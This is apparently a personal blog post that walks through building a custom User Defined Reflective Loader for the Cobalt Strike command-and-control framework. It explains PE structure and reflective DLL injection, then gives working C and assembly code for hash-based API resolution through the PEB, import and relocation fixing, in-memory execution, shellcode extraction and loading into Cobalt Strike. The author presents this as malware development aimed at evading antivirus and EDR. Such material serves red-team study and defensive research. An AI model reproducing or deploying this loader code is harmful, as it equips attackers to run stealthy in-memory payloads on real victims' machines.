Cobalt Strike - User Defined Reflective Loader Studies

Brain dump of information and insight I picked up learning about UDRLs. Nothing I talk about is new, many smarter people before me had figured it out already.

Introduction

What's up people! In this blog post we're gonna dive into Cobalt Strike's - User Defined Reflective Loader (UDRL), what it is and how to develop your own :). I must proclaim what I'm explaining here is NOT new, there are a couple of URDLs out there already with the most notable being Austin Hudson's TitanLdr , C5pider's KaynStrike, and Boku7's BokuLoader. Also, custom loaders have been around for over a couple of decades with one of the most notable being Stephen Fewer's - Reflective DLL Injection technique.

This blog post is more of a brain dump of what I've learn't about UDRLs rather than an official tutorial as there are still certain aspects I don't understand fully. However, I hope to clarify this concept more and maybe inspire people to look at this feature in Cobalt Strike (CS) and make their own UDRLs!

This topic is extensive and unfortunately I won't be able to explain every minor detail so some prior knowledge of the following concepts will most certainly aid you in understanding the topics discussed.

  • C Programming Language

  • Windows API

  • Windows Portable Executable

  • Reflective DLL Injection

  • Windows Internals

  • Cobalt Strike

  • Assembly Language

Don't worry though I will be providing a lot of resources throughout this blog post to help you understand these concepts further!

User Defined Reflective Loader

So, what is a User Defined Reflective Loader? First, we should probably take several steps back and get a high level overview of:

  1. Portable Exectuables

  2. Reflective DLL Injection

Portable Executables

What is a Portable Exeutable (PE)? Essentially a PE in relation to the Windows operating system is the native Win32 file format. If you are a Windows user you may have seen some of these file formats on your PC/Laptop, for example .exe and .dll are representations of PEs.

But what is the point of PEs? The PE acts as a data structure that tells the Windows OS loader what information is required to manage the wrapped executable code. This information can be used for dynamic library references for linking, API export, import tables, resource management data etc. In essence the PE is like a directory filled with information regarding the file format being loaded from disk into memory.

The PE has many sections within it each holding it's own important information (except for the DOS header, it's kinda useless :p) regarding our file format. Here is an example of a PE's layout -

At first glance is looks super confusing, and I'm not gonna lie...it is super confusing when you first learn about PEs lol. We'll be going over the sections and headers highlighted in the above image during the coding walkthrough portion of this blog!

Reflective DLL Injection

Now, some understanding of process injetion in general will be best if you want to understand this concept but I will do my best in order to simplify it as best as I can :). Reflective DLL Injetion (RDI) is a technique invented by Stephen Fewer as previously stated, however the concpet that underpins this technique is known as Manaul Mapping (MM), which from my research as been around since the late 90's, early 00's!

So what is RDI? RDI is the technique of creating and loading a Dynamic-Link Library (DLL) in memory to avoid touching the disk. This is a useful technique in relation to malware development because it means as an attacker AV/EDR's will have a harder time detecting your payload unless meticulously scanning in memory.

So how is this technique done? Well, When you need to load a DLL in Windows, you need to call LoadLibrary, that takes the file path of a DLL and loads it in to memory. However, in our case we're not trying to load from disk. We want to load from memory, and LoadLibrary doesn't do that. So we have to create our own LoadLibrary functionality.

So essentially for RDI we need to load and execute a DLL in memory.

Here's an image representation of RDI -

Again, I'm not gonna lie this topic when first learning it can be confusing and trying to represent the concept in an image is well...not that helpful tbh :|, but here it is none the less ;p.

So after this massive digression we come full circle to our initial question...

What is a User Defined Reflective Loader?

Hopefully, after my shoddy explanations of PE and RDI you should have an inkling of what a UDRL is and does. Essentially, it is CS allowing you (the operator) the functionality to implement the creation and use of a custom reflective loader within their C2 framework. As an operator this allows us a huge platform to develop a custom payload or post-exploitation beacon with cool features and functionality.

Sounds cool right? But how do we make one?

UDRL Development

So as we've ascertained we need to develop a DLL that loads itself, and executes itself in memory. This procedure can be done via shellcode. Shellcode is usually written in the Assembly language but doing so is a tedious and tricky task which can go wrong easily. Fortunately for me, people way smarter than myself have developed ways of implementing this concpet in C and taking advantage of the C compiler. The concepts discussed in this blog have been documented by security reseachers such as Hasherezade in her From a C project, through assembly, to shellcode whitepaper, and Modexp's Shellcode: In-Memory Execution of DLL. Implementation of these concepts can also be found within the KaynStrike and TitanLdr UDRLs.

Resolving API Addresses in Memory

When a PE is loaded via disk, all API calls referenced in the code can be found in the Import Address Table (IAT) and Export Address Table (EAT). These tables are created by the linker during compilation. Resolving these tables is done at runtime and handled by default but we don't have that luxury unfortunately. We must resolve API calls by ourselves.

The API functions can be retrieved by using the Process Environment Block (PEB) which is created at a process' runtime. On execution of the UDRL shellcode in our target process, we should be able to locate the PEB of the target, and then use that reference to search for the DLLs that contain the APIs we wish to load!

Within the PEB there are a lot of structures which contain information about the running process. However, the structure we're most concerned with is the Ldr structure

We can gain access to a PEB via the structure that contains it called the Thread Environment Block (TEB). The TEB is accessed via segement registers in assembly. For 32 bit it is the FS register and for 64 bit it is the GS register. The related offsets within the TEB for these registers are 0x30 (32bit) and 0x60 (64bit).

So, in order to access the PEB via C code we can setup a macro to the particular offset relative to the segment register pointing to the TEB.

#ifdef _WIN64
#define PebLdr __readgsqword(0x60)
#else
#define PebLdr __readfsdword(0x30)
#endif

Now, in the Ldr structure discussed earlier there is a linked list which will give us the name of all the DLLs loaded in the memory of a running process. This list can be walked in order for us to check if the DLL in the list is the DLL we need for our APIs. The following code below demonstrates this process

GRP_SEC(E) PVOID LoadPebModule(DWORD Hash) {

	PLDR_DATA_TABLE_ENTRY	  ModuleLdr = NULL; 
	PLIST_ENTRY		  PebModule = NULL; 
	PLIST_ENTRY		  NextEntry = NULL;

	PebModule = &((PPEB)PebLdr)->Ldr->InLoadOrderModuleList; 

	NextEntry = PebModule->Flink; 

	do {
		
		ModuleLdr = (PLDR_DATA_TABLE_ENTRY)NextEntry;
	
		
		if (HashFunction(ModuleLdr->BaseDllName.Buffer, ModuleLdr->BaseDllName.Length) == Hash) {
			
			return ModuleLdr->DllBase;
		}
		
		NextEntry = NextEntry->Flink;

	} while (PebModule != NextEntry);

	return NULL; 
}

Essentially what the code above is doing is accessing one of the linked lists within the Ldr structure called InLoadOrderModuleList. We can assign our NextEntry variable to the Flink parameter of this list and walk through the list checking the current listed DLLs name and length against a hash representation of the DLL we want. The ModuleLdr variable will be a pointer to the the LDR_DATA_TABLE_ENTRY stucture which is NTDLL’s record of how a DLL is loaded into a process. If our hash and DLL in the list are a match, success! We can then return the DLLs base address via the DllBase parameter in LDR_DATA_TABLE_ENTRY.

Looking Up Exports

Once we have the base address of our DLL (in our case ntdll.dll), we need to find the address of the APIs we'll be using within our code. For our UDRL the following APIs will be used -

  • RtlAnsiStringToUnicodeString

  • NtAllocateVirtualMemory

  • NtProtectVirtualMemory

  • LdrGetProcedureAddress

  • RtlFreeUnicodeString

  • RtlInitAnsiString

  • LdrLoadDll

We can find these functions via the EAT. In order to do this we need to traverse the PE. Functions are exported by a DLL in two ways, name or by ordinal. The EAT is accessed through the IMAGE_EXPORT_DIRECTORY within the IMAGE_DATA_DIRECTORY.

If you're not familar with the PE format I'm sure at this stage you're thinking what on earth is going on! No problem, this is expected and understanding will come with time lol. However, I'll do my best to explain by walking through the code of the function that will load our exported functions. Below is an example of the code.

GRP_SEC(E) PVOID LoadExports(PVOID ZenImage, DWORD Hash) {

	PIMAGE_EXPORT_DIRECTORY		ExportDir	= NULL; 
	PIMAGE_DATA_DIRECTORY		DataDir		= NULL;
	PIMAGE_NT_HEADERS			NtHeaders	= NULL; 
	PIMAGE_DOS_HEADER			DosHeader	= NULL; 

	PDWORD	NameAddress		= NULL;
	PDWORD	FuncAddress		= NULL;
	PWORD	OrdAddress		= NULL;

	DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 
	

	NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew); 
	

	DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 

	if (DataDir->VirtualAddress) {

		ExportDir	= CONVERT(PIMAGE_EXPORT_DIRECTORY, DosHeader, DataDir->VirtualAddress); 
		

		NameAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfNames);
	

		FuncAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfFunctions); 
		

		OrdAddress	= CONVERT(PWORD, DosHeader, ExportDir->AddressOfNameOrdinals);  
	

		for (DWORD Index = 0; ExportDir->NumberOfNames != 0; Index++) {

			if (HashFunction(CONVERT(PVOID, DosHeader, NameAddress[Index]), 0) == Hash) {

				return CONVERT(PVOID, DosHeader, FuncAddress[OrdAddress[Index]]); 
			}
		}
	}

	return NULL; 
}

So, this is where that image presented in the Portable Executables section of the blog comes in handy. First thing we need to do is get the start of our image via IMAGE_DOS_HEADER. Basically all PE files start with the DOS header which occupies the first 64 bytes of the file. This header file really doesn't do much except give us a useful offset to the e_lfanew parameter that points to the PE/NT header portion of our PE.

The PE header is the general term for a structure named IMAGE_NT_HEADERS. This stucture contains important information used by the loader. Within IMAGE_NT_HEADERS there are 3 members. What we're focused on right now is the OptionalHeader member. The name is kinda misleading as it is most certainly not optional with regards to it's importance in the PE :p! The OptionalHeader is a large structure within the PE taking up 224 bytes, and 128 of those bytes belong to the DataDirectory!

In the DataDirectory we have a number of...directories lol. There are 16 IMAGE_DATA_DIRECTORY structures. Each of these relate to a structure within the PE file. The structure we're interested in is the IMAGE_EXPORT_DIRECTORY which is the first structure within the DataDirectory.

So essentially this portion of code below from our function is just again walking the PE in order to get us to our export directory structure. The 0 you see is just the index of where the export directory is within the list, 0 == first because you know...computers like to be confusing!

DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 

NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);  

DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 

Now once we reach the IMAGE_EXPORT_DIRECTORY we need to access the memebers within it. Each structure within the DataDirectory contains a VirtualAddress and Size of the data structure in question. To access the export structure we need to check if the VirtualAddress is valid and if that's the case, point the important members to our declared variables. In our situation the members we need are -

AddressOfFunctions - A relative virtual address (RVA) that points to an array of addresses for functions in a DLL.

AddressOfNames - An RVA that points to an array of names of the functions in a DLL.

AddressOfOrdinals - An RVA that points to a 16 bit array that contains the ordinals of the named funcitons within a DLL.

Essentially our IMAGE_EXPORT_DIRECTORY points to three arrays. What we want to do is iterate through theses arrays comparing the hash of our function against the NameAddress variable. If we get a match to the function we want then the function returns a pointer to the address of the function associated with the Index-th export. The pointer is obtained by adding the value stored in the Index-th element of the array pointed to by OrdAddress (which represents the address of the name ordinal of the Index-th export) to the value stored in the Index-th element of the array pointed to by FuncAddress (which represents the address of the function of the Index-th export), and then adding the result to the base address of the PE image.

Looking Up Imports

Next step is processing the IAT of our image loaded into memory. The IAT is a table that contains the addresses of functions that are imported from other DLLs. When an image is loaded into memory and executed, the IAT is used to resolve the addresses of these imported functions so that the image can call them.

The purpose of the function below is to update the IAT with the actual addresses of the imported functions. This is necessary because when the image is compiled, the IAT contains only the names of the imported functions, not their actual addresses. When the image is loaded into memory, the IAT must be updated with the correct addresses of the imported functions so that the image can call them.

Let's step through some code to gain a better understanding.

First thing we need to do is resolve those functions previously mentioned in the Load Exports section. This will be done using our LoadPebModule and LoadExports functions.

Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

	Resolve.Function.RtlAnsiStringToUnicodeString	= LoadExports(Resolve.Dll.Ntdll, RTLANSISTRINGTOUNICODESTRING_HASH);
	Resolve.Function.LdrGetProcedureAddress		= LoadExports(Resolve.Dll.Ntdll, LDRGETPROCEDUREADDRESS_HASH);
	Resolve.Function.RtlFreeUnicodeString		= LoadExports(Resolve.Dll.Ntdll, RTLFREEUNICODESTRING_HASH);
	Resolve.Function.RtlInitAnsiString		= LoadExports(Resolve.Dll.Ntdll, RTLINITANSISTRING_HASH);
	Resolve.Function.LdrLoadDll			= LoadExports(Resolve.Dll.Ntdll, LDRLOADDLL_HASH);

Next wext we need to loop through the Import Directory which is an array of IMAGE_IMPORT_DESCRIPTOR structures. These structures contain information about the DLL our PE file imports functions from.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR, *PIMAGE_IMPORT_DESCRIPTOR;

The three fields we're interested in are -

    • OriginalFirstThunk - Contains offsets to the names of the imported functions.

    • Name - Null terminated string of the module to import API from.

    • FirstThunk - Contains offsets to the actual addresses of the functions.

Each descriptor contains RVA that points to array of IMAGE_THUNK_DATA structures. Each entry represents information about the imported API.

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA, * PIMAGE_THUNK_DATA;

First thing to do is call the RtlInitAnsiString function to initialise the name of the DLL. The name of the DLL is stored in the Name field of the import directory entry and the RtlInitAnsiString function initializes an ANSI string with a pointer to this data.

Next we call the RtlAnsiStringToUnicodeString function to convert the ANSI string to a Unicode string. This is necessary because the LdrLoadDll function, which is called later in the loop, expects a Unicode string as its third argument (the DLL name). Would be good to note that LdrLoadDll is what gets called before jumping into the kernel when LoadLibrary is invoked.

for (ImportDesc = (PVOID)ImportDir; ImportDesc->Name != 0; ImportDesc++) {

		Name = CONVERT(PVOID, ZenImage, ImportDesc->Name); 

		Resolve.Function.RtlInitAnsiString(&AniDllName, Name); 

		Status = Resolve.Function.RtlAnsiStringToUnicodeString(&UniDllName, &AniDllName, TRUE);

We then call our LdrLoadDll function to the load the DLL into memory. This function returns a handle to the DLL in the DllHandle variable.

Once we have a handle to our DLL we need to initialize two pointers to the start of the OriginalFirstThunk (OFT) and the FirstThunk (FT) tables for the DLL, respectively. These tables contain the entries for the functions that the image imports from the DLL. The OFT contains the original names of the imported functions as they appeared in the image's import table, while FT contains the actual addresses of the imported functions in memory.

if (NT_SUCCESS(Status)) {

    Status = Resolve.Function.LdrLoadDll(NULL, 0, &UniDllName, &DllHandle); 

    if (NT_SUCCESS(Status)) {

	OrgThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->OriginalFirstThunk); 
				

	FirstThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->FirstThunk); 

Now we can iterate through the entries in the OFT and FT tables. For each entry, and check whether the entry specifies an imported function by name or by ordinal. If the entry specifies an imported function by name, it calls the LdrGetProcedureAddress function (This is the function that GetProcAddress calls when invoked) to look up the address of the function in the DLL and updates the corresponding entry in the FT table with the correct address. If the entry specifies an imported function by ordinal, it calls the LdrGetProcedureAddress function to look up the address of the function in the DLL by its ordinal and updates the corresponding entry in the FT table with the correct address.

When the loop finishes, the FT table will contain the correct addresses of all the imported functions from the DLL, and the image will be able to call these functions when it is executed.

while (OrgThunk->u1.AddressOfData != 0) {

     if (IMAGE_SNAP_BY_ORDINAL(OrgThunk->u1.Ordinal)) {

	Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, 0, IMAGE_ORDINAL(OrgThunk->u1.Ordinal), &FuncAddr); 

		if (NT_SUCCESS(Status)) {

		   FirstThunk->u1.Function = FuncAddr; 
		}
     }
     else {

	    ImportName = CONVERT(PIMAGE_IMPORT_BY_NAME, ZenImage, OrgThunk->u1.AddressOfData); 
						
	    Resolve.Function.RtlInitAnsiString(&AniDllName, (PVOID)ImportName->Name);

	    Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, &AniDllName, 0, &FuncAddr); 

	   if (NT_SUCCESS(Status)) {

		FirstThunk->u1.Function = FuncAddr;
	   }

     }

	OrgThunk++; 

	FirstThunk++; 
}

Lastly, the loop then calls the RtlFreeUnicodeString function to free the memory used by the Unicode string.

Relocations

Some quick theory to explain what we're doing here. When an PE file is created by the linker it has to make an assumption about where the file will be mapped into memory. This assumption leads the linker to hard code addresses of code and data items within the compiled PE file. If the PE file is not loaded from the base address hard-coded into the file...we have a problem. In order to circumvent this issue the offsets regarding the hard-coded information are stored in the .reloc section of the section header. This section allows the PE loader to fix the addresses in the loaded image.

The entries within the .reloc section are called base relocations as they depend of the base address of the loaded image. This is just a list of locations in the image. The base relocation entries are allocated in a series of variable length chunks, with each chunk representing the relocations for one 4KB page in the image.

So, for our function we need to process a directory of image base relocations for an image in memory. The directory is an array of IMAGE_BASE_RELOCATION structures.

typedef struct _IMAGE_BASE_RELOCATION {
  DWORD   VirtualAddress;
  DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;

The VirtualAddress field specifies the virtual address of the first byte of the page where the base relocations are applied. The SizeOfBlock field specifies the size of the block, in bytes, including the IMAGE_BASE_RELOCATION structure and all of the IMAGE_RELOC structures that follow it.

The IMAGE_RELOC structure is defined as follows:

typedef struct _IMAGE_RELOC {
    WORD Offset : 12;
    WORD Type : 4;
} IMAGE_RELOC, * PIMAGE_RELOC;

First we need to initialise a pointer to the start of the relocation directory, then initialise a variable to the difference between the image base address of where the file is loaded in memory and the image base address that was specified when the image was compiled. This difference is referred to as the delta.

ImgBaseReloc	= (PVOID)BaseRelocDir; 

Delta		= (PVOID)((ULONG_PTR)ZenImage - (ULONG_PTR)ImageBase);

The function then enters a loop that iterates over all of the blocks in the relocation directory. For each block, it initializes a pointer to the start of the block and enters another loop that iterates over all of the relocations in the block.

for (; ImgBaseReloc->VirtualAddress != 0; ImgBaseReloc = (PVOID)Relocation) {

	Relocation = (PIMAGE_RELOC)(ImgBaseReloc + 1); 

	for (; (PBYTE)Relocation != CONVERT(PBYTE, ImgBaseReloc, ImgBaseReloc->SizeOfBlock); R

For each relocation, the function reads the Type field and applies the relocation based on the value of this field. There are several different types of relocations that can be applied, but the function only handles three of them.

IMAGE_REL_BASED_DIR64 and IMAGE_REL_BASED_HIGHLOW are combined within a macro called IMAGE_REL_TYPE and IMAGE_REL_BASED_ABSOLUTE which is just used as padding so the next relocation is aligned on a 4-byte boundry.

switch (Relocation->Type) {

	case IMAGE_REL_BASED_ABSOLUTE:

		break; 

        case IMAGE_REL_TYPE:

             *(ULONG_PTR*)((PBYTE)ZenImage + ImgBaseReloc->VirtualAddress + Relocation->Offset) += (ULONG_PTR)Delta; 

				
	}
 

DLL Entry

Finally! We've got all the components necessary for loading a PE. Our final step is to set up a main function that will process all this information and execute our UDRL in memory. The process behind our main function requires the following steps.

  • Allocate memory for size of our image

  • Copy each section to our new allocated memory space

  • Initialise import table

  • Apply relocations

  • Set the memory permission to be executable

  • Execute entry point of DLL

First step is initialising some function calls, NtAllocateVirtualMemory and NtProtectVirtualMemory functions in the ntdll library.

Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

Resolve.Function.NtAllocateVirtualMemory	= LoadExports(Resolve.Dll.Ntdll, NTALLOCATEVIRTUALMEMORY_HASH);

Resolve.Function.NtProtectVirtualMemory		= LoadExports(Resolve.Dll.Ntdll, NTPROTECTVIRTUALMEMORY_HASH);

As our code is being injected into memory we first need to find ourself in the target process' memory space. The CODE_END() macro calculates the end address of a code section relative to the address of the GetIp (instruction pointer) symbol in memory. Typecasting this macro to a pointer of our IMAGE_DOS_HEADER should give us the starting point of our PE in memory. This technique is used in TitanLdr.

#define CODE_END( x )	(ULONG_PTR)( GetIp( ) + 11 )

Next, the function obtains the size of our PE image via SizeOfImage and allocates a page of memory with NtAllocateVirtualMemory.

DosHeader = (PIMAGE_DOS_HEADER)CODE_END();

NtHeaders = CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);

ZenImageSize = NtHeaders->OptionalHeader.SizeOfImage; 

Status = Resolve.Function.NtAllocateVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, 0, &ZenImageSize, MEM_COMMIT, PAGE_READWRITE);

We then need to loop through all the sections of a PE file and copy their contents into a new location in memory. The PE file is made up of several sections that each contain different types of data, such as code, data, or resources.

The IMAGE_FIRST_SECTION macro returns a pointer to the first section of the PE file, NumberOfSections is a field that specifies the total number of sections in the file. The loop iterates through each section using an index variable Index, which starts at 0 and goes up to one less than the number of sections.

Inside the loop we need to copy the contents of each section from its location in the original PE file to a new location in memory. The destination address is calculated by adding the section's virtual address to the base address of the new memory region, and the source address is calculated by adding the section's raw data offset to the base address of the original PE file. The size of the data to copy is specified by the SizeOfRawData field of the section header.

Overall, this code is essentially copying the entire contents of the original PE file into a new memory region, with each section being placed at its correct virtual address.

if (NT_SUCCESS(Status)) {

SecHeader = IMAGE_FIRST_SECTION(NtHeaders);

SIZE_T Index = 0;
while (Index < NtHeaders->FileHeader.NumberOfSections) {

  MemCpy
      (

       (PBYTE)ZenBaseAddress + SecHeader[Index].VirtualAddress,
       (PBYTE)DosHeader + SecHeader[Index].PointerToRawData,
       SecHeader[Index].SizeOfRawData
      );

      Index++;
}

The next step is processing the IAT and relocation table in the input PE image. These need to be accessed through the IMAGE_DATA_DIRECTORY discussed previously.

DataDir = &NtHeaders->OptionalHeader.DataDirectory[1];

if (DataDir->VirtualAddress) {

  LoadImports((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress));
}

DataDir = &NtHeaders->OptionalHeader.DataDirectory[5];

if (DataDir->VirtualAddress) {

  LoadRelocations((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress), NtHeaders->OptionalHeader.ImageBase);
}

The initial protections on our memory pages are PAGE_READWRITE, we'd need to change that in order to actually execute our DLL in memory. Once that is done we retrieve the address of the entry point function in the input PE image and call it, passing the address of the struct as an argument. The entry point function is responsible for setting up the remaining program state and transferring control to the program's main code.

SecSize = SecHeader->SizeOfRawData;

Status = Resolve.Function.NtProtectVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, &SecSize, PAGE_EXECUTE_READ, &Protections);

if (NT_SUCCESS(Status)) {

  ZenEntry = CONVERT(ZenDllMain, ZenBaseAddress, NtHeaders->OptionalHeader.AddressOfEntryPoint);
  ZenEntry(SYMBOL(Start), 1, NULL);
  ZenEntry(SYMBOL(Start), 4, NULL);
}

The ZenEntry variable represents DllMain which is an entry point into a DLL. When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process.

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD     fdwReason,
  _In_ LPVOID    lpvReserved
);

The SYMBOL macro calculates the address of a symbol x which is represenetd by a function called Start relative to the address of the GetIp symbol in memory. Both Start and GetIp are essentially Assembly stubs we can combine with our C code. Again, this concept is used in TitanLdr.

#define SYMBOL( x )      ( ULONG_PTR )( GetIp( ) - ( ( ULONG_PTR ) & GetIp - ( ULONG_PTR ) x ) )

Combining C & Assembly

Woah, that was a lot of info right? If you're still with us, I salute you :). If not, no worries I completely understand why, lmao!

So it should be stated that I am no Assembly wizard but will do my best to provide an explanation regarding the code and concepts being applied in this section.

Section Alignment

Now, when initialising and delcaring our function calls there will be a GRP_SEC(x) parameter before the function type and name...why? Essentially the Windows PE has a functionality called Grouped Sections. This allows multiple sections to be treated as a single unit with respect to certain operations.

In a PE file, sections are used to store various types of data, such as code, resources, and data. When the file is loaded into memory, the sections are mapped into memory as separate regions, with each section having its own address and protection attributes.

Grouped sections allow two or more adjacent sections to be treated as a single unit for the purposes of memory mapping and file alignment. This is accomplished by assigning the same section characteristics to each section in the group and specifying the total size of the group in the section header of the first section. This means that the sections within a group can share the same protection attributes and alignment requirements, which can help to reduce file size and improve loading performance.

Our macro looks like this -

#define GRP_SEC( x ) __attribute__(( section( ".text$" #x ) ))

Windows documentation states

When determining the image section that will contain the contents of an object section, the linker discards the "$"? and all characters that follow it. Thus, an object section named .text$X actually contributes to the .text section in the image.

However, the characters following the "$"? determine the ordering of the contributions to the image section. All contributions with the same object-section name are allocated contiguously in the image, and the blocks of contributions are sorted in lexical order by object-section name. Therefore, everything in object files with section name .text$X ends up together, after the .text$W contributions and before the .text$Y contributions.

In order to implement this we can create a linker file using the SECTIONS command which is used to create different sections in the final PE file generated. This is a technique used in TitanLdr.

SECTIONS
{
   .text :
   {
      *( .text$A )
      *( .text$B )
      *( .text$C )
      *( .text$D )
      *( .text$E )
      *( .rdata* )
      *( .text$F )
    }
}

Stack Alignment

We'll be compiling our shellcode in 64bit, this means we will need a 16-byte stack alignment. That is to say that if you are to push only 1 8-byte value onto the stack, you should pad it by adding the other 8 bytes.This is due to a requirement imposed by utilizing 128-bit XMM registers. We can make sure this stack alignment is implemented in some simple assembly code.

[BITS 64]

Extern ZenLdr

GLOBAL Start

[SECTION .text$A]

Start:

    push rsi
    mov rsi, rsp
    and rsp, 0FFFFFFFFFFFFFFF0h
    sub rsp, 020h
    call ZenLdr
    mov rsp, rsi
    pop rsi
    ret

Quick overview -

[BITS 64] - Highlights this assembly code is operating within a x64 architecture.

Extern ZenLdr - This the Extern type represents an external function that will be called from outside the assembly code in our case ZenLdr which is the name of our main function.

GLOBAL Start - Highlights a procedure that will take place within our assembly code, but also allows us to call this procedure within our C code.

Now, your keen eye may notice the [SECTION .text$A]. This is what we were previously discussing in the Section Alignment walkthrough. Here we are placing the instructions called within our Start procedure in the .text$A portion of our text section. This will be the first function called in our shellcode. This is because if our stack isn't aligned correctly the rest of the code won't execute.

The actual Start procedure works like this -

- Push RSI onto the stack - Save the value of RSP so it can be restored - Align RSP to 16 bytes - Allocate space for our main function - Call the entry point of the main function - Restore the original value of RSP - Restore RSI - Return to caller

PE Extraction

Once our code is compiled into an executable we'll need to extract the raw binary in-order to execute as shellcode. There's a couple of ways of doing this one is using objdump on our executable, then placing that output within a .bin file. However, Python has a module called pefile that is a nice way of extracting our .text section which is what the CS documentation states -

The reflective loader's executable code is the extracted .text section from a user provided compiled object file. The extracted executable code must be less than 100KB.

Compilation

In order to compile the UDRL we'll be using x86_64-w64-mingw32-gcc. When compiling the code certain flags need to be put in palce in-order to set the correct function odering, linking scripts, and preventing the inclusion of extraneous code etc.

Below is an example of the complete makefile.

CC_X64	:= x86_64-w64-mingw32-gcc

CFLAGS	:= $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib 
CFLAGS 	:= $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
CFLAGS  := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
CFLAGS	:= $(CFLAGS) -falign-labels=1 -fPIC -Wl,-TSectionLink.ld
LFLAGS	:= $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup

OUTX64	:= ZenLdr.x64.exe
BINX64	:= ZenLdr.x64.bin

all:
	@ echo [+] Compiling ZenLdr
	@ nasm -f win64 asm/Start.asm -o Start.x64.o
	@ nasm -f win64 asm/GetIp.asm -o GetIp.x64.o
	@ $(CC_X64) *.c Start.x64.o GetIp.x64.o -o $(OUTX64) $(CFLAGS) $(LFLAGS) -I.
	@ echo [+] Extracting .text section into $(BINX64)
	@ python3 python3/extract.py -f $(OUTX64) -o $(BINX64)

clean:
	@ rm -rf *.o
	@ rm -rf *.bin
	@ rm -rf *.exe

Execution

Now we're in the end game :p. In order to load our binary into CS we'll need an Aggressor Script. We'll need to use the BEACON_RDLL_GENERATE function to implement our UDRL in CS.

There're plenty of ways this payload can be delivered but one scencario could be you already have a beacon on your target machine and you want to inject into another process your target is running.

It should be noted I'm using CS 4.7.2. In version 4.6 it was apparently possible to make an .exe beacon to execute the shellcode (demonstrated on KaynStrike github) directly but that doesn't work in 4.7 for some reason (my assembly and debugging skills aren't good enough to figure out why either lol). Also, as of the time writing this I believe CS is now on verison 4.8, which I have not tested on.

The Windows version for the target machine was 10.0.19045.

Below is a demonstation.

Conclusion

So there you have it! A working proof of concept UDRL. It must be noted that my PoC is barebones, there's so much functionality that can be added to it but the point of this exercise was just to understand the process behind making one. Recently a security researcher and red teamer Kyle Avery made AceLdr. This UDRL evades memory scanning using techniques like Return Address Spoofing. Definitely check out the blog post a Youtube video!

There's still a lot more for me to understand regarding UDRLs but I hope this blog has at least made somethings clearer...if not, sorry for wasting your time :p!

If you've got this far and feel there's something that could be explained better, please let me know :)

Link to the code if you're interested - https://github.com/Mav3rick33/ZenLdr

Credits

Austin Hudson - TitanLdr (The original UDRL which all others have built their PoC's from)

C5pider - KaynStrike (Another UDRL implementation taking inspiration from TitanLdr)

Modexp - Cool security researcher and developer should definitely check out his blog

Hasherezade - Another cool security researcher and developer check out her blog

Matt Graeber - Writing Optimized Windows Shellcode in C (One of the earliest documentations of writing shellcode in C)

Cobalt Strike - User Defined Reflective Loader documentation

ReactOS - cool website that has a lot of info regarding Undocumented Windows APIs

C Compilation - Concise video about how C code compiles

Tmxlab - (Original language is Korean)

Donut - https://github.com/TheWover/donut/tree/dafea1702ce2e71d5139c4d583627f7ee740f3ae (Shellcode loader partly developed by Modexp)

PIC Your Malware - A cool Youtube video on position independent code

Understanding Windows x64 Assesmbly - Great tutorial for understanding x64 Assembly

Reflective DLL Injection explained - A good video I found explaining RDI

Memory Based Library Loading Someone Did That Already - Great video about the concept of MM and how it's been around since the 90's

Life Of Binaries - The BEST overview of the Portable Executable, referenced these videos tons of times to better my understanding

Last updated